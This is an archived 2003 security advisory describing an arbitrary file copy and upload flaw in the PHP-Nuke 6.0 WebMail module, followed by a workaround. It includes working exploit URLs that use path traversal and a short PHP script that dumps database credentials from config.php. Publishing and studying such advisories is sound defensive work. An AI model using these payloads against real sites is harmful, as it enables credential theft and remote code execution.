Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: sb5940.htm

PHP-Nuke allows remote copy of arbitrary files



21th Jan 2003 [SBWID-5940]
COMMAND

	PHP-Nuke allows remote copy of arbitrary files

SYSTEMS AFFECTED

	PHP-nuke 6.0 with WebMail 0.9.3 is confirmed vulnerable

PROBLEM

	Karol WiÍsek [appelast-at-bsquad.sm.pl] found :
	
	--snip--
	
	Remote attacker could transfer to server his own file or copy  arbitrary
	file from system to accessible directory. The result of such acts  could
	be remote execution  commands  under  privileges  of  httpd  server,  or
	retrieving important information such as database  login  and  password.
	Attacker even don't have to be registered user  to  make  an  attack,but
	needs writable directory.
	
	The crux of  the  problem  lies  in  WebMail  module,  and  exactly  int
	mailattach.php file. This Module is default attached to PHP-nuke  6.0  (
	current ). And even this module don't have  to  be  active  to  make  an
	attack successful, because it can be accessed directly ( no  modules.php
	in $PHP_SELF check present in this file).
	
	snip from mailatach.php
	
	if (isset($userfile) AND $userfile != "none") {
	    if (ini_get(file_uploads) AND $attachments == 1) {
		$updir = "tmp";
		@copy($userfile, "$updir/$userfile_name");
	
	Sample attack which allows an attacker to  grab  database  password  and
	login.
	
	http://target.server/modules/WebMail/mailattach.php?userfile=../../config.php&userfile_name=../attachments/file.txt&attachments=1
	
	Using mailattach.php attacker could  upload  file  with  any  extension,
	which allow him to upload any .php file and execute arbitrary PHP code.
	
	To successfully exploiting  this  vulnerability  writable  directory  is
	needed. When module  is  active,  the  tmp  and  attachmenst  should  be
	writable to allow module work properly.
	
	 ANALYSIS
	 ========
	
	Remote exploitation allows an attacker  to  execute  arbitrary  commands
	and code under the privileges of the web server.  This  also  opens  the
	door to privilege escalation attacks. Attacker could  also  debug  httpd
	child processes and grab secret information like  users  pop3  passwords
	used to authentication to remote pop3 server in WebMail  module.  Having
	database password he also has access to all information about users.
	
	 Update (02 March 2003)
	 ======
	
	Lorenzo        Hernandez        Garcia-Hierro        [admin@novappc.com]
	[http://novappc.com) adds :
	
	
	CODE:
	
	http://NUKESITE/modules/WebMail/mailattach.php?%20userfile=[DIR TO PHP 
	FILE ]&userfile_name=../attachments/h4ckz.php&attachments=1
	
	DESCRIPTION:
	
	[DIR TO PHP FILE]:
	
	This is the directory of your php file that prints the  content  of  the
	variables in config.php , the code of the file is:
	
	<?php
	include ("../../config.php")
	echo 'DB User:',"$dbuname";
	echo '<br><br>';
	echo 'Host for Fuck:',"$dbhost";
	echo '<br><br>';
	echo 'Password:',"$dbpass";
	echo '<br><br>';
	echo 'Thats all folks my little fucker';
	?>
	
	This file load variables from  config.php  to  the  h4ckz.php  file  end
	prints all content of the variables using echo function of php.
	
	You only must access the temporal file in the server  in  the  directory
	that you put in the &userfile_name of the xploit url.
	
	WHAT CAN BE HAPPEN?
	
	All the passwords of config.php are given , the attacker can be  use  it
	for modify, rename or DELETE the database depending  of  the  privileges
	and the situation of the web admin tool , like phpnuke  and  the  access
	configuration of database , acept tcp/ip connects or not accept.
	
	ONLY AFFECT WEBMAIL?
	
	No, all the modules that upload files can be unsafely  because  you  can
	modify the variables of the xploit url to run  with  other  module  that
	upload files.

SOLUTION

	
	 Workaround
	 ==========
	
	As suggested by Lorenzo Hernandez Garcia-Hierro :
	
	FIRST: Modify code of all the files that upload files of course for  die
	when the file is called  remotely  (  QUERY_STRING  remote  and  REFERER
	remote) , you an find more info about this in the modules.php file.
	
	SECOND: Be sure (optional) that the php-nuke not use  a  root  user  for
	database.
	
	THIRD: Modify mysql/postgre/etc  config  for  only  accept  connects  of
	localhost and the web admin apps. like php admin ( on remote  servers  )
	cant run with your server ;-) FOURTH: Activate  only  the  modules  that
	you use, Xd.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH